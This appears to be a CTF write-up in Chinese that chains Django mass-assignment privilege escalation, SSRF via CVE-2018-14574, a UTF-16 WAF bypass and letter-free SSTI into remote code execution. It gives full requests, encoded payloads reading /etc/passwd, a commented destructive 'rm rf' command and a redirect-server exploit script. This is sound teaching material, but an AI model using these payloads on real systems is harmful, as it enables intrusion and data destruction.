源码审计,预期是 成为Django-admin -> 利用CVE-2018-14574 造成SSRF打flask_rpc -> UTF16或者unicode绕过 {{限制 -> 无字母SSTI 由于写的太急了忘记限制symbols为一个字符,非预期是直接利用symbols绕过 #### 预期 #### 成为admin ```python def reg(request): if request.method == "GET": return render(request, "templates/reg.html") elif request.method == "POST": try: data = json.loads(request.body) except ValueError: return JsonResponse({"code": -1, "message": "Request data can't be unmarshal"}) if len(User.objects.filter(username=data["username"])) != 0: return JsonResponse({"code": 1}) User.objects.create_user(**data) return JsonResponse({"code": 0}) ``` 可以看到把json对象全部传入了create_user,这是python的一个语法,会把字典元素变为键值对作为函数参数,本意是方便开发 比如{"username":"admin", "password":"123456"} 即是 User.objects.create_user(username="admin",password="123456") 所以我们可以传入恶意键值对,在注册的时候直接变为admin,查阅文档或者翻下django项目的数据库找到对应列名 {"username":"admin","password":"123456","is_staff":1,"is_superuser":1} 即可成为admin ``` POST /reg/ HTTP/1.1 Host: 192.168.15.133:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Content-Length: 70 Origin: http://192.168.15.133:8000 Connection: close Referer: http://192.168.15.133:8000/reg/ {"username":"admin","password":"123456","is_staff":1,"is_superuser":1} ``` 然后登入admin后台,获取token #### CVE-2018-14574 Django < 2.0.8 存在任意URL跳转漏洞,我们可以通过这个来SSRF 由于path采用了re_path,我们只需要传入 http://39.104.19.182//8.8.8.8/login 即可跳转到任意url的login路由 ``` POST /home/ HTTP/1.1 Host: 192.168.15.133:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: csrftoken=C1JAgkBIk8uqH9XF2CHBlsWDSPfOwNZHmj7RfnqqEdH1pqtPSvuNgxGNdodpZGta; sessionid=e8gd9dipyijy3t96hn5jujv1d0o90r0o Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 100 {"token":"xxxxxxxxxxxxxxxxxxxxxx","url":"http://39.104.19.182//8.8.8.8/login"} ``` 由于python request库会自动跟随302 然后我们在自己的vps上搭一个服务,继续跳转到本地127.0.0.1:8000/flask_rpc 就可以SSRF访问flask_rpc开始打flask #### UTF16 && unicode ```python @app.before_request def before_request(): data = str(request.data) log() if "{{" in data or "}}" in data or "{%" in data or "%}" in data: abort(401) ``` flask做了一个简单的waf,不允许ssti的关键字符,需要bypass 此处有两个办法 ```python @app.route('/caculator', methods=["POST"]) def caculator(): try: data = request.get_json() ``` 但是flask获取参数的方式又是get_json方法,我们跟入一下 ```python def get_json(self, force=False, silent=False, cache=True): """Parse :attr:`data` as JSON. If the mimetype does not indicate JSON (:mimetype:`application/json`, see :meth:`is_json`), this returns ``None``. If parsing fails, :meth:`on_json_loading_failed` is called and its return value is used as the return value. :param force: Ignore the mimetype and always try to parse JSON. :param silent: Silence parsing errors and return ``None`` instead. :param cache: Store the parsed JSON to return for subsequent calls. """ if cache and self._cached_json[silent] is not Ellipsis: return self._cached_json[silent] if not (force or self.is_json): return None data = self._get_data_for_json(cache=cache) try: rv = self.json_module.loads(data) except ValueError as e: if silent: rv = None if cache: normal_rv, _ = self._cached_json self._cached_json = (normal_rv, rv) else: rv = self.on_json_loading_failed(e) if cache: _, silent_rv = self._cached_json self._cached_json = (rv, silent_rv) else: if cache: self._cached_json = (rv, rv) return rv ``` 看到`rv = self.json_module.loads(data)`继续跟入 ```python @staticmethod def loads(s, **kw): if isinstance(s, bytes): # Needed for Python < 3.6 encoding = detect_utf_encoding(s) s = s.decode(encoding) return _json.loads(s, **kw) ``` ```python def detect_utf_encoding(data): """Detect which UTF encoding was used to encode the given bytes. The latest JSON standard (:rfc:`8259`) suggests that only UTF-8 is accepted. Older documents allowed 8, 16, or 32. 16 and 32 can be big or little endian. Some editors or libraries may prepend a BOM. :internal: :param data: Bytes in unknown UTF encoding. :return: UTF encoding name .. versionadded:: 0.15 """ head = data[:4] if head[:3] == codecs.BOM_UTF8: return "utf-8-sig" if b"\x00" not in head: return "utf-8" if head in (codecs.BOM_UTF32_BE, codecs.BOM_UTF32_LE): return "utf-32" if head[:2] in (codecs.BOM_UTF16_BE, codecs.BOM_UTF16_LE): return "utf-16" if len(head) == 4: if head[:3] == b"\x00\x00\x00": return "utf-32-be" if head[::2] == b"\x00\x00": return "utf-16-be" if head[1:] == b"\x00\x00\x00": return "utf-32-le" if head[1::2] == b"\x00\x00": return "utf-16-le" if len(head) == 2: return "utf-16-be" if head.startswith(b"\x00") else "utf-16-le" return "utf-8" ``` 可以看到flask的get_json方法会通过传入的body自动判断编码然后解码,这就与之前的waf存在一个差异 我们可以把exp进行UTF16编码然后bypass waf 另一个办法就是\u unicode字符进行绕过 #### bypass字母 好了{{我们已经可以bypass了,但是num还限制了不能有字母,这个怎么办 python里面,我们可以通过 '\123'来表示一个字符,我们就可以通过这个来bypass字母的限制 这个对应关系并不遵守Ascii,所以我们可以先遍历存入字典 ```python exp = "request" dicc = [] exploit = "" for i in range(256): eval("dicc.append('{}')".format("\\\"+str(i))) for i in exp: exploit += "\\\\\\\"+ str(dicc.index(i)) print(exploit) ``` 用这个脚本转换一下常规的SSTI ```python data = r'''{"num1":"{{()['\\\137\\\137\\\143\\\154\\\141\\\163\\\163\\\137\\\137']['\\\137\\\137\\\142\\\141\\\163\\\145\\\163\\\137\\\137'][0]['\\\137\\\137\\\163\\\165\\\142\\\143\\\154\\\141\\\163\\\163\\\145\\\163\\\137\\\137']()[155]['\\\137\\\137\\\151\\\156\\\151\\\164\\\137\\\137']['\\\137\\\137\\\147\\\154\\\157\\\142\\\141\\\154\\\163\\\137\\\137']['\\\137\\\137\\\142\\\165\\\151\\\154\\\164\\\151\\\156\\\163\\\137\\\137']['\\\145\\\166\\\141\\\154']('\\\137\\\137\\\151\\\155\\\160\\\157\\\162\\\164\\\137\\\137\\\50\\\47\\\157\\\163\\\47\\\51\\\56\\\160\\\157\\\160\\\145\\\156\\\50\\\47\\\143\\\141\\\164\\\40\\\57\\\145\\\164\\\143\\\57\\\160\\\141\\\163\\\163\\\167\\\144\\\47\\\51\\\56\\\162\\\145\\\141\\\144\\\50\\\51')}}","num2":1,"symbols":"+"}''' print(data.encode("utf-16")) ``` 把两个脚本结合一下 ```python from flask import Flask, request, render_template_string,redirect import re import json import string,random import base64 app = Flask(__name__) from urllib.parse import quote #exp = "__import__('os').popen('rm rf /*').read()" #exp = "__import__('os').popen('cat /flag').read()" exp = "__import__('os').popen('/readflag').read()" dicc = [] exploit = "" for i in range(256): eval("dicc.append('{}')".format("\\\"+str(i))) for i in exp: exploit += "\\\\\\\"+ str(dicc.index(i)) @app.route('/login/') def index(): # data = r'''{"num1":"{{()['\\\137\\\137\\\143\\\154\\\141\\\163\\\163\\\137\\\137']['\\\137\\\137\\\142\\\141\\\163\\\145\\\163\\\137\\\137'][0]['\\\137\\\137\\\163\\\165\\\142\\\143\\\154\\\141\\\163\\\163\\\145\\\163\\\137\\\137']()[155]['\\\137\\\137\\\151\\\156\\\151\\\164\\\137\\\137']['\\\137\\\137\\\147\\\154\\\157\\\142\\\141\\\154\\\163\\\137\\\137']['\\\137\\\137\\\142\\\165\\\151\\\154\\\164\\\151\\\156\\\163\\\137\\\137']['\\\145\\\166\\\141\\\154']('\\\137\\\137\\\151\\\155\\\160\\\157\\\162\\\164\\\137\\\137\\\50\\\47\\\157\\\163\\\47\\\51\\\56\\\160\\\157\\\160\\\145\\\156\\\50\\\47\\\143\\\141\\\164\\\40\\\57\\\145\\\164\\\143\\\57\\\160\\\141\\\163\\\163\\\167\\\144\\\47\\\51\\\56\\\162\\\145\\\141\\\144\\\50\\\51')}}","num2":1,"symbols":"+"}'''.encode("utf16") data = (r'''{"num1":"{{()['\\\137\\\137\\\143\\\154\\\141\\\163\\\163\\\137\\\137']['\\\137\\\137\\\142\\\141\\\163\\\145\\\163\\\137\\\137'][0]['\\\137\\\137\\\163\\\165\\\142\\\143\\\154\\\141\\\163\\\163\\\145\\\163\\\137\\\137']()[64]['\\\137\\\137\\\151\\\156\\\151\\\164\\\137\\\137']['\\\137\\\137\\\147\\\154\\\157\\\142\\\141\\\154\\\163\\\137\\\137']['\\\137\\\137\\\142\\\165\\\151\\\154\\\164\\\151\\\156\\\163\\\137\\\137']['\\\145\\\166\\\141\\\154']('%s')}}","num2":1,"symbols":"+"}''' % exploit).encode("utf16") data = quote(base64.b64encode(data)) return redirect("http://127.0.0.1:8000/rpc/?methods=POST&url=http%3a//127.0.0.1%3a5000/caculator&mime=application/json&data="+data) if __name__ == '__main__': app.run(host="0.0.0.0",port=5000,debug=True) ``` vps上搭好后,向home路由请求一下自己的vps即可看到flag